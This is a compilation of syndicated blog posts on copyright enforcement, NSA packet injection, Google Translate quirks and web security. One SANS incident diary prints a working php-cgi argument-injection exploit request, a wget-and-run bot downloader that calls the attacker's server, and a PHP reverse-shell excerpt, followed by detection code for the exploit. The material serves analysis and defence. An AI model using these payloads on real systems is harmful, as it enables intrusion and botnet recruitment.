This grim outlook isn’t shared by the operators of ABS-CBN, the largest media and entertainment company in the Philippines, who filed a lawsuit against several unauthorized streaming sites at a District Court in Oregon.

The company’s complaint alleges a mixture of trademark and copyright infringement against a dozen websites including Pinoystreaming.com, Pinoytvko.biz and Pinoy-tube.com. The sites in question are operated by different people, some of whom have no apparent connection to the United States.

To stop the sites from operating as quickly as possible the media company requested a temporary restraining order. This was done under seal without the knowledge of the defendants, as ABS-CBN feared that they would otherwise switch domain names and continue operating as usual.

“Absent a temporary restraining order, Defendants will be able to completely erase the status quo by transferring the benefits of their prior illegal activities to new websites,” the company argued.

In short, ABS-CBN requested power to take the sites offline before the owners knew that they were getting sued, and without a chance to defend themselves. While that may seem a lot to ask, Judge Anna Brown granted the request.

Earlier this month the Judge signed the temporary restraining order which bars the operators from running their sites. In addition, it allows the media company to order hosting companies to take down the servers, domain registrars to seize the domain names, and search engines to remove all results linking to the sites.

“Upon Plaintiffs’ request, those with actual notice of the injunction, including any Internet search engines, Web hosts, domain-name registrars, and domain name registries or their administrators, shall cease facilitating access to any or all domain names and websites…,” the order reads.

The court also ordered the domain name registrars to point the domains to a copy of the complaint, so the website owners would know why their sites had been wiped from the Internet. Further, to prevent the defendants from passing on Google traffic to a new domain, ABS-CBN was granted permission to access the Google Webmaster Tools of the defendants.

“Plaintiffs may enter the Subject Domain Names into Google’s Webmaster Tools and cancel any redirection of the domains that have been entered there by Defendants which redirect traffic to a new domain name or website and thereby evade the provisions of this Order,” the order reads.

The above is just part of the injunction which effectively shuts down the sites in question. All websites in the suit are now redirected to a copy of the complaint. Also, several domains are no longer present in Google’s search results.

The preliminary injunction is unique in its kind, both due to its broadness and the fact that it happened without due process. This has several experts worried, including EFF’s Intellectual Property Director Corynne McSherry.

“It’s very worrisome that a court would issue a rapid and broad order affecting speech based on allegations, without careful consideration and an opportunity for the targets to defend themselves,” McSherry tells TorrentFreak.

In addition to the restraining order, Judge Brown also granted ABS-CBN’s request to freeze all financial assets of the defendants until further notice. The defendants were given the option to appeal both orders after they were issued, but it’s unknown whether they have done so.

This is not the first ex-parte injunction to be handed down against alleged pirate sites this month. The same happened in the Expendables 3 case, although this order wasn’t nearly as broad as the one against the Filipino streaming sites.

Whether it’s the start of a new trend has yet to be seen, but considering the broad measures judges are willing to sign off, things could get messy.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Schneier on Security: QUANTUM Technology Sold by Cyberweapons Arms Manufacturers

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Last October, I broke the story about the NSA’s top secret program to inject packets into the Internet backbone: QUANTUM. Specifically, I wrote about how QUANTUMINSERT injects packets into existing Internet connections to redirect a user to an NSA web server codenamed FOXACID to infect the user’s computer. Since then, we’ve learned a lot more about how QUANTUM works, and general details of many other QUANTUM programs.

These techniques make use of the NSA’s privileged position on the Internet backbone. It has TURMOIL computers directly monitoring the Internet infrastructure at providers in the US and around the world, and a system called TURBINE that allows it to perform real-time packet injection into the backbone. Still, there’s nothing about QUANTUM that anyone else with similar access can’t do. There’s a hacker tool called AirPwn that basically performs a QUANTUMINSERT attack on computers on a wireless network.

A new report from Citizen Lab shows that cyberweapons arms manufacturers are selling this type of technology to governments around the world: the US DoD contractor CloudShield Technologies, Italy’s Hacking Team, and Germany’s and the UK’s Gamma International. These programs intercept web connections to sites like Microsoft and Google — YouTube is specially mentioned — and inject malware into users’ computers.

Turkmenistan paid a Swiss company, Dreamlab Technologies — somehow related to the cyberweapons arms manufacturer Gamma International — just under $1M for this capability. Dreamlab also installed the software in Oman. We don’t know what other countries have this capability, but the companies here routinely sell hacking software to totalitarian countries around the world.

There’s some more information in this Washington Post article, and this essay on the Intercept.

In talking about the NSA’s capabilities, I have repeatedly said that today’s secret NSA programs are tomorrow’s PhD dissertations and the next day’s hacker tools. This is exactly what we’re seeing here. By developing these technologies instead of helping defend against them, the NSA — and GCHQ and CESG — are contributing to the ongoing insecurity of the Internet.

Related: here is an open letter from Citizen Lab’s Ron Deibert to Hacking Team about the nature of Citizen Lab’s research and the misleading defense of Hacking Team’s products.

TorrentFreak: ISPs Face Lawsuits After Failing to Block The Pirate Bay

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Following favorable rulings on website-blocking from both the European Court of Justice and the local Supreme Court, at the end of July several Austrian movie companies renewed their mission to have ‘pirate’ sites blocked at the ISP level.

VAP, the anti-piracy association of the Austrian film and video industry, wrote to several local ISPs – UPC, Drei, Tele2 and A1 – demanding a blockade of three domains – ThePirateBay.se, Movie4K.to and Kinox.to.

Just days later the IFPI signaled its intention to join the fray. In a letter dated August 4 and sent to five local ISPs, the music group set a deadline of less than two weeks for the service providers to block subscriber access to ThePirateBay.se, isoHunt.to, 1337x.to and H33t.to.

After the VAP letter came talks between the anti-piracy outfit and the ISPs, but a deadline of August 14 expired last week with no blocking having taken place. While the courts have confirmed that in certain circumstances service providers can be required to block errant sites, it appears that the ISPs don’t want to take action based on mere requests from rightsholders.

“We continue to believe that the decision to block websites or other Internet content should lie with the courts and legislators,” UPC told Austrian news outlet Future Zone.

“We have sympathy for rightsholders and we are in full support of the creative industries. However, we offer our customers access to the Internet and have no obligation or right to choose which content is accessed.”

Faced with blocking requests around Europe, most if not all ISPs have required a court order in order to restrict access to ‘pirate’ sites. Given this history, UPC’s reluctance comes as no surprise to VAP. Managing Director Werner Müller admitted last week that it was always unlikely that the ISPs would act without being legally required to do so. That means legal action, and VAP are ready for it.

“There will soon be a lawsuit concerning blocking against two websites – kinox.to and movie4k.to – against four major domestic Internet providers,” Müller says. “The lawsuits are prepared and are waiting almost only on their delivery.”

And, according to comments made by IFPI CEO Franz Medwenitsch, the music industry won’t be far behind.

“As of today there has been no response from the service providers so we had our attorney begin the preparations for legal action,” Medwenitsch confirms.

These web-blocking cases being brought against Austrian ISPs are of particular importance as they represent the first to take place following the March 27 ruling of the European Court of Justice. How that ruling is interpreted will be closely watched by rightsholders across the continent.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Third Unreleased Doctor Who Episode Leaks Online

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

In July, news broke that following a serious error at a BBC office in Miami, the scripts and video to the brand new series of Doctor Who had accidentally been made available online.

While the BBC closed down the security breach, it didn’t do so quickly enough. The scripts were made available on file-sharing networks first and they were soon followed by the leak of the first episode.

Destined for Marcelo Camargo of Marc Drei Productions, a Brazil-based production company known for its subtitling work, the unfinished ‘workprint’ release wasn’t to be the last. Less than a week ago the first full copies of the second episode “Into The Dalek” started doing the rounds, prompting concerns of whether the leaks would stop there or continue.

That question now seems to have been answered. A 1,020MB file currently being made available via The Pirate Bay is the third episode in the new series. The file follows the naming convention of the previous two leaks, suggesting that the video comes from the same source.

Rumored to be titled “Robots of Sherwood”, the episode confirms details revealed in the leaked scripts and sees Doctor Who venturing back in time for a memorable meeting with Robin Hood.


As can be seen from the screenshot, the episode is presented in monochrome and is heavily watermarked. Special effects and other elements of final polish also appear to be absent.

The question now falls to whether the remaining three episodes of six will also leak to mainstream file-sharing networks such as BitTorrent. There are reports of episodes four, five and six appearing on the eD2K network (sometimes known as eDonkey) but thus far there are no confirmed full downloads.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Lorem Ipsum: Of Good & Evil, Google & China

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Imagine discovering a secret language spoken only online by a knowledgeable and learned few. Over a period of weeks, as you begin to tease out the meaning of this curious tongue and ponder its purpose, the language appears to shift in subtle but fantastic ways, remaking itself daily before your eyes. And just when you are poised to share your findings with the rest of the world, the entire thing vanishes.

This fairly describes my roller coaster experience of curiosity, wonder and disappointment over the past few weeks, as I’ve worked alongside security researchers in an effort to understand how “lorem ipsum” — common placeholder text on countless Web sites — could be transformed into so many apparently geopolitical and startlingly modern phrases when translated from Latin to English using Google Translate. (If you have no idea what “lorem ipsum” is, skip ahead to a brief primer here).

Admittedly, this blog post would make more sense if readers could fully replicate the results described below using Google Translate. However, as I’ll explain later, something important changed in Google’s translation system late last week that currently makes the examples I’ll describe impossible to reproduce.

CHINA, NATO, SEXY, SEXY

It all started a few months back when I received a note from Lance James, head of cyber intelligence at Deloitte. James pinged me to share something discovered by FireEye researcher Michael Shoukry and another researcher who wished to be identified only as “Kraeh3n.” They noticed a bizarre pattern in Google Translate: When one typed “lorem ipsum” into Google Translate, the default results (with the system auto-detecting Latin as the language) returned a single word: “China.”

Capitalizing the first letter of each word changed the output to “NATO” — the acronym for the North Atlantic Treaty Organization. Reversing the words in both lower- and uppercase produced “The Internet” and “The Company” (the “Company” with a capital “C” has long been a code word for the U.S. Central Intelligence Agency). Repeating and rearranging the word pair with a mix of capitalization generated even stranger results. For example, “lorem ipsum ipsum ipsum Lorem” generated the phrase “China is very very sexy.”

Until very recently, the words on the left were transformed to the words on the right using Google Translate.


Kraeh3n said she discovered the strange behavior while proofreading a document for a colleague, a document that had the standard lorem ipsum placeholder text. When she began typing “l-o-r..e..” and saw “China” as the result, she knew something was strange.

“I saw words like Internet, China, government, police, and freedom and was curious as to how this was happening,” Kraeh3n said. “I immediately contacted Michael Shoukry and we began looking into it further.”

And so the duo started testing the limits of these two words using a mix of capitalization and repetition. Below is just one of many pages of screenshots taken from their results:


The researchers wondered: What was going on here? Has someone outside of Google figured out how to map certain words to different meanings in Google Translate? Was it a secret or covert communications channel? Perhaps a form of communication meant to bypass the censorship erected by the Chinese government with the Great Firewall of China? Or was this all just some coincidental glitch in the Matrix?

For his part, Shoukry checked in with contacts in the U.S. intelligence industry, quietly inquiring if divulging his findings might in any way jeopardize important secrets. Weeks went by and his sources heard no objection. One thing was for sure, the results were subtly changing from day to day, and it wasn’t clear how long these two common but obscure words would continue to produce the same results.

“While Google translate may be incorrect in the translations of these words, it’s puzzling why these words would be translated to things such as ‘China,’ ‘NATO,’ and ‘The Free Internet,’” Shoukry said. “Could this be a glitch? Is this intentional? Is this a way for people to communicate? What is it?”

When I met Shoukry at the Black Hat security convention in Las Vegas earlier this month, he’d already alerted Google to his findings. Clearly, it was time for some intense testing, and the clock was already ticking: I was convinced (and unfortunately, correct) that much of it would disappear at any moment.

A BRIEF HISTORY OF LOREM IPSUM

Cicero.


Search the Internet for the phrase “lorem ipsum,” and the results reveal why this strange phrase has such a core connection to the lexicon of the Web. Its origins in modernity are murky, but according to multiple sites that have attempted to chronicle the history of this word pair, “lorem ipsum” was taken from a scrambled and altered section of “De finibus bonorum et malorum,” (translated: “Of Good and Evil,”) a 1st-Century B.C. Latin text by the great orator Cicero.

According to Cecil Adams, curator of the Internet trivia site The Straight Dope, the text from that Cicero work was available for many years on adhesive sheets in different sizes and typefaces from a company called Letraset.

“In pre-desktop-publishing days, a designer would cut the stuff out with an X-acto knife and stick it on the page,” Adams wrote. “When computers came along, Aldus included lorem ipsum in its PageMaker publishing software, and you now see it wherever designers are at work, including all over the Web.”

This pair of words is so common that many Web content management systems deploy it as default text. Case in point: Lorem Ipsum even shows up on healthcare.gov. According to a story published Aug. 15 in the Daily Mail, more than a dozen apparently dormant healthcare.gov pages carry the dummy text.


FURTHER TESTING

Things began to get even more interesting when the researchers started adding other words from the Cicero text from which the “lorem ipsum” bit was taken, including: “Neque porro quisquam est qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit . . .”  (“There is no one who loves pain itself, who seeks after it and wants to have it, simply because it is pain …”).

Adding “dolor” and “sit” and “consectetur,” for example, produced even more bizarre results. Translating “consectetur Sit Sit Dolor” from Latin to English produces “Russia May Be Suffering.” “sit sit dolor dolor” translates to “He is a smart consumer.” An example of these sample translations is below:


Latin is often dismissed as a “dead” language, and whether or not that is fair or true it seems pretty clear that there should not be Latin words for “cell phone,” “Internet” and other mainstays of modern life in the 21st Century. However, this incongruity helps to shed light on one possible explanation for such odd translations: Google Translate simply doesn’t have enough Latin texts available to have thoroughly learned the language.

In an introductory video titled Inside Google Translate, Google explains how the translation engine works, the sources of the engine’s intelligence, and its limitations. According to Google, its Translate service works “by analyzing millions and millions of documents that have already been translated by human translators.” The video continues:

“These translated texts come from books, organizations like the United Nations, and Web sites from all around the world. Our computers scan these texts looking for statistically significant patterns. That is to say, patterns between the translation and the original text that are unlikely to occur by chance. Once the computer finds a pattern, you can use this pattern to translate similar texts in the future. When you repeat this process billions of times, you end up with billions of patterns, and one very smart computer program.”

Here’s the rub:

“For some languages, however, we have fewer translated documents available, and therefore fewer patterns that our software has detected. This is why our translation quality will vary by language and language pair.”

Still, this doesn’t quite explain why Google Translate would include so many references specific to China, the Internet, telecommunications, companies, departments and other odd couplings in translating Latin to English.

In any case, we may never know the real explanation. Just before midnight, Aug. 16, Google Translate abruptly stopped translating the word “lorem” into anything but “lorem” from Latin to English. Google Translate still produces amusing and peculiar results when translating Latin to English in general.

A spokesman for Google said the change was made to fix a bug with the Translate algorithm (aligning ‘lorem ipsum’ Latin boilerplate with unrelated English text) rather than a security vulnerability.

Kraeh3n said she’s convinced that the lorem ipsum phenomenon is not an accident or chance occurrence.

“Translate [is] designed to be able to evolve and to learn from crowd-sourced input to reflect adaptations in language use over time,” Kraeh3n said. “Someone out there learned to game that ability and use an obscure piece of text no one in their right mind would ever type in to create totally random alternate meanings that could, potentially, be used to transmit messages covertly.”

Meanwhile, Shoukry says he plans to continue his testing for new language patterns that may be hidden in Google Translate.

“The cleverness of hiding something in plain sight has been around for many years,” he said. “However, this is exceptionally brilliant because these templates are so widely used that people are desensitized to them, and because this text is so widely distributed that no one bothers to question why, how and where it might have come from.”

SANS Internet Storm Center, InfoCON: green: Web Server Attack Investigation – Installing a Bot and Reverse Shell via a PHP Vulnerability, (Sat, Aug 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

With Windows malware getting so much attention nowadays, it’s easy to forget that attackers also target other OS platforms. Let’s take a look at a recent attempt to install an IRC bot written in Perl by exploiting a vulnerability in PHP.

The Initial Probe

The web server received the initial probe from 46.41.128.231, an IP address that at the time was not flagged as malicious on various blacklists:

HEAD / HTTP/1.0

The request lacked the headers typically present in an HTTP request, which is why the web server’s firewall rejected it with a 403 Forbidden status code. That response was nevertheless sufficient for the attacker’s tool to confirm that it had located a web server.

The Exploitation Attempt

The offending IP address initiated another connection to the web server approximately 4 hours later. This time, the request was less gentle than the initial probe:

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded

As shown above, the attacking system attempted to access /cgi-bin/php on the targeted server. The query string supplied to /cgi-bin/php, once URL-decoded (each %XX is a hex-encoded byte and each + is a space), corresponds to this:

-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

These parameters, when supplied to a vulnerable version of /cgi-bin/php, are interpreted as php-cgi command-line options and dramatically reduce the security of the PHP configuration for that request (-d overrides individual php.ini directives and -n tells php-cgi to ignore php.ini altogether). We covered a similar pattern in our 2012 diary when describing the CVE-2012-1823 vulnerability in PHP. The fix to that vulnerability was poorly implemented, which resulted in the CVE-2012-2311 vulnerability that affected “PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script,” according to MITRE. The ISS advisory noted that,

“PHP could allow a remote attacker to execute arbitrary code on the system, due to an incomplete fix for an error related to parsing PHP CGI configurations. An attacker could exploit this vulnerability to execute arbitrary code on the system.”

SpiderLabs documented a similar exploitation attempt in 2013, where they clarified that “one of the key modifications is to specify ‘auto_prepend_file=php://input‘ which will allow the attacker to send PHP code in the request body.”
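As an added example that is not part of the diary, the following Python reproduces the server-side step that makes this request dangerous and then hunts for the pattern in access logs. RFC 3875 only passes a query string to a CGI program as command-line words when the query contains no literal “=”; the words are split on “+” and then percent-decoded. That is why every “=” in the request above is encoded as %3D: the web server sees none, hands the words to php-cgi as argv, and php-cgi obeys the -d and -n options. The same mechanism is behind the original CVE-2012-1823 demonstration, a bare ?-s that dumps the script source. The log lines are constructed in Combined Log Format; the exploit query string is the one quoted above, while the other requests are made up for contrast.

```python
"""Flag php-cgi argument injection (CVE-2012-1823 / CVE-2012-2311) in web logs.

Added illustration, not code from the diary. SAMPLE_LOG is constructed: the
exploit query is the one quoted in the diary, the other lines are made up.
"""
import re
from urllib.parse import unquote, urlsplit

# php.ini directives the attacker sets with -d so the request body runs as PHP.
RISKY_DIRECTIVES = {
    "allow_url_include", "auto_prepend_file", "auto_append_file",
    "disable_functions", "safe_mode", "open_basedir", "suhosin.simulation",
    "cgi.force_redirect", "cgi.redirect_status_env",
}

# Combined Log Format: just enough to pull client IP, method, target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
FLAG_RE = re.compile(r"-[A-Za-z]")  # php-cgi options look like -d, -n, -s ...


def cgi_argv(raw_query: str) -> list:
    """Reproduce what an RFC 3875 server hands a CGI program as argv.

    Only a query string with no *literal* '=' is passed as command-line words
    (split on '+', then percent-decoded). The exploit therefore encodes every
    '=' as %3D: the server sees none and php-cgi parses the words as options.
    """
    if not raw_query or "=" in raw_query:
        return []
    return [unquote(word) for word in raw_query.split("+") if word]


def classify_query(raw_query: str) -> dict:
    """Return {} for a normal query; otherwise the php-cgi options it smuggles:
    the flags seen, the php.ini directives set with -d, and the risky subset."""
    argv = cgi_argv(raw_query)
    flags = [a for a in argv if FLAG_RE.match(a)]
    if not flags:
        return {}
    directives = []
    for i, arg in enumerate(argv):
        if arg == "-d" and i + 1 < len(argv):        # "-d name=value"
            directives.append(argv[i + 1].split("=", 1)[0])
        elif arg.startswith("-d") and len(arg) > 2:  # "-dname=value"
            directives.append(arg[2:].split("=", 1)[0])
    return {
        "flags": sorted(set(flags)),
        "directives": directives,
        "risky": sorted(set(directives) & RISKY_DIRECTIVES),
    }


def scan_log(lines) -> list:
    """One finding per log line whose query string smuggles php-cgi options."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        finding = classify_query(parts.query)
        if finding:
            hits.append({"ip": m["ip"], "method": m["method"], "path": parts.path,
                         "status": m["status"], **finding})
    return hits


# The query string from the diary's POST, reassembled verbatim.
EXPLOIT_QUERY = (
    "%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+"
    "%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+"
    "%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+"
    "%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+"
    "%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+"
    "%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+"
    "%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+"
    "%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E"
)

SAMPLE_LOG = [  # constructed lines; timestamps and byte counts are made up
    '46.41.128.231 - - [16/Aug/2014:09:00:00 +0000] "HEAD / HTTP/1.0" 403 0',
    '203.0.113.9 - - [16/Aug/2014:12:00:00 +0000] "GET /index.php?id=5&page=2 HTTP/1.1" 200 4120',
    f'46.41.128.231 - - [16/Aug/2014:13:00:00 +0000] "POST /cgi-bin/php?{EXPLOIT_QUERY} HTTP/1.1" 200 512',
    '198.51.100.23 - - [16/Aug/2014:13:05:00 +0000] "GET /index.php?-s HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The check keys on the raw, still-encoded query string rather than on a decoded copy, because the presence or absence of a literal “=” is exactly what decides whether the server builds an argv at all; decoding first would hide that distinction and flag harmless key=value queries.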

The Exploit’s Primary Payload: Downloading a Bot

With the expectation that the initial part of the malicious POST request reconfigured PHP, the body of the request began with the following code:

<?php system("wget ip-address-redacted/speedtest/.a/hb/phpR05 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7;rm -rf /tmp/.bash_h1s7 &"); ?>

If the exploit succeeded, this code would direct the targeted server to download /.a/hb/phpR05 from the attacker’s server, save it as /tmp/.bash_h1s7, run it with Perl and then delete it. Searching the web for “phpR05” showed a file of this name being used in various exploitation attempts; one such example was very similar to the incident described in this diary. (In a strange coincidence, that PHP attack was visible in the data that the server was leaking due to a Heartbleed vulnerability!)

The malicious Perl script was an IRC bot, and was recognized as such by several antivirus tools according to VirusTotal. Here’s a tiny excerpt from its code:

#####################
# Stealth Shellbot  #
#####################

sub getnick {
  return "Rizee|RYN|05|".int(rand(8999)+1000);
}

This bot was very similar to the one described by James Espinosa in 2013 in an article discussing Perl/ShellBot.B trojan activity, which began with attempts to exploit a phpMyAdmin file inclusion vulnerability.

The Exploit’s Secondary Payload: Reverse Shell

In addition to supplying instructions to download the IRC bot, the malicious POST request contained PHP code that implemented a reverse shell, directing the targeted web server to establish a connection back to the attacker’s server on TCP port 22. That script began like this:

$ip = 'ip-address-redacted';
$port = 22;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';

Though the attacker specified port 22, the reverse shell didn’t use SSH. Instead, it expected the attacker’s server to listen on that port using a simple tool such as Netcat. Experimenting with this script and Netcat in a lab environment confirmed this, as shown in the following screenshot:

In this laboratory experiment, ‘nc -l -p 22‘ directed Netcat to listen for connections on TCP port 22. Once the reverse shell script ran on the system that mimicked the compromised server, the simulated attacker had the ability to run commands on that server (e.g., ‘whoami‘).

Interestingly, the production server’s logs showed that the system in the wild was listening on TCP port 22; however, it was actually running SSH there, so the reverse shell connection established by the malicious PHP script would have failed.

A bit of web searching revealed a script called ap-unlock-v1337.py, reportedly written in 2012 by “noptrix,” which was designed to exploit the PHP vulnerability outlined above. That script included the exact exploit code used in this incident and included the code that implemented the PHP-based reverse shell. The attacker probably used that script with the goal of installing the Perl-based IRC bot, ignoring the reverse shell feature of the exploit.

Wrap Up

The attack, probably carried out by an automated script that probed random IP addresses, was designed to build an IRC-based botnet. It targeted Unix systems running a version of PHP susceptible to a two-year-old vulnerability; that such an attempt is still worth an attacker’s time suggests there are plenty of unpatched systems left to compromise. The attacker used an off-the-shelf exploit and an unrelated off-the-shelf bot, both readily available on the Internet. The attacker’s infrastructure included three different IP addresses, none of which were blacklisted at the time of the incident.

– Lenny Zeltser

Lenny Zeltser focuses on safeguarding customers’ IT operations at NCR Corp. He also teaches how to analyze malware at SANS Institute. Lenny is active on Twitter. He also writes a security blog, where he recently described other attacks observed on a web server.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Ferguson Attacks And Web Censorship Are Parts Of Same Story

This post was syndicated from: TorrentFreak and was written by: Rick Falkvinge. Original post: at TorrentFreak

The governments around the world are reacting the exact same way today as they did when the printing press arrived 500 years ago. There isn’t really anything new under the sun.

Then, as now, they were used to telling people what was true and what wasn’t, telling whatever story that fit whatever it was they wanted to do.

“Cannabis is dangerous. Tobacco is not harmful at all. Oh, and there are weapons of mass destruction in Iraq.”

When police troops in Ferguson launched tear gas grenades at a television team from Al-Jazeera, that is a symptom of the exact same thing as web censorship: governments are losing control of the story. Governments can no longer invent whatever truth that fits what they want to happen. Police firing at press is actually something very rare – even in the worst of war zones, it’s a rare occurrence that press teams are deliberately targeted, and yet, this was precisely what happened in Ferguson, USA.

The reason is the exact same as for web censorship and mass surveillance:

The governments and the people working for them are attacking anybody who exposes what they do, using whatever power they have to do so.

Tear gas grenades against a TV crew may have been both overviolent and counterproductive, but it’s still the same thing. It’s exactly what happened when the printing press arrived, and the penalties for using a printing press – thereby circumventing the truthtellers of that time – gradually increased to the death penalty (France, 1535).

Not even the death penalty worked to deter people from using the printing press to tell their version of events to the world, which more often than not contradicted the official version. The cat was out of the bag. As it is now. Governments and police still don’t understand that everybody is a broadcaster – attacking a TV crew was futile in the first place.

During the initial, hopeful months of the Arab Spring, a lot of photos circulated of young people gathering for protests. What was interesting about the photos was not only that they were taken with mobile phones, but also that they showed a lot of other people at the protest taking photos of the same crowd at the same time with their own mobile phones. Thus, the photos of the ongoing revolution contained instructions in themselves for how to perpetuate the revolution – take pictures of crowds defying the edicts and dictums.

This is why it’s so puzzling that the police even bother to give special treatment to people from television stations and newspapers. Strictly speaking, they’re not necessary to get the story out anymore, even if they still have some follower advantage for the most part.

“Police are being transformed from protecting the public into protecting government from the public”, as @directorblue just tweeted. That could be said about pretty much anything concerning the net, too — from oppressive applications of copyright monopoly law to strangling net innovations or giving telcos monopolies that prevent the net’s utility.

The attacks on the public by police troops in Ferguson, attacks from the copyright industry against those who want a free net, and web censorship by governments are all different sides of the same story. And all of this has happened before. Last time this happened, it took 200 years of civil war to settle the dust and agree that the printing press may have been a nice invention after all.

Can we please not repeat that mistake?

About The Author

Rick Falkvinge is a regular columnist on TorrentFreak, sharing his thoughts every other week. He is the founder of the Swedish and first Pirate Party, a whisky aficionado, and a low-altitude motorcycle pilot. His blog at falkvinge.net focuses on information policy.


Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: Part 1: Is your home network unwittingly contributing to NTP DDOS attacks?, (Sun, Aug 17th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

For the last year or so, I have been investigating UDP DDOS attacks. In this diary I would like to spotlight a somewhat surprising scenario where a manufacturer’s misconfiguration on a popular consumer device combined with a design decision in a home gateway router may make you an unwitting accomplice in amplified NTP reflection DDOS attacks.

This is part 1 of the story.  I will publish the conclusion Tuesday August 19th.

Background

Today almost every house has consumer broadband services.  Typical broadband installations will have a device, usually provided by your service provider, which acts as a modem, a router and a firewall (for the rest of the diary this device will be called a gateway router).   In a nutshell the firewall in the gateway router permits network traffic initiated on your network out to the Internet, and permits responses to that traffic back into your network.  Most importantly the firewall will block all traffic destined for your network which is not a response to traffic initiated from your network.  This level of firewall capability meets the requirements of almost all broadband consumers on the Internet today.   

For those of us power users who required more capability, gateway router manufacturers tended to support a port forwarding feature that would allow us to accommodate servers and other devices behind the firewall.  This was great for us tech-savvy folk, but typically port forwarding was beyond the understanding of the average Internet user like my Dad (sorry Dad!) or my Grandma.

In the last few years, consumer devices that plug into your home network and use more complicated networking that does not fit the standard initiate-respond model have become more common. The most common of those are gaming consoles, but other devices like home automation and storage devices can also be an issue. As stated above, setting up port forwarding so these devices will function properly is beyond the average Internet user’s capability. Luckily the gateway router vendors have thought of that as well.

To simplify connecting these devices, gateway router vendors tend to implement one of two ways of supporting these devices.  Most support Universal Plug and Play (UPnP) with a minority of  vendors supporting Full-cone NAT.  

Investigation

It begins with a complaint from a reputable source that a customer is participating in a reflective NTP DDOS attack utilizing monlist for amplification.

The complaint is against XXX.160.28.174, a dynamic address broadband customer. The analyst’s first thought is that this is a tech-savvy user who has set up an NTP server and added port forwarding to their router. It should be easy to resolve: contact the customer and tell him to patch his NTP server to the current version and everything will be great! Unfortunately, this is where things go sideways.

While network monitoring clearly shows this customer’s connection participating in an NTP DDOS attack, a review of the firewall configuration showed that there are no ports forwarded on the firewall.

But the NAT logs in the firewall show a large number of outbound connections to various addresses originating from this device and most of them don’t appear to be to NTP servers. 

172.16.1.64:123, f: 192.75.12.11:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 199.182.221.110:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 142.137.247.109:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 129.128.5.211:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 206.108.0.132:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 94.185.82.194:443, n: XXX.160.28.174:123
172.16.1.64:123, f: 60.226.113.100:80, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:24572, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:38553, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:24572, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:47782, n: XXX.160.28.174:123
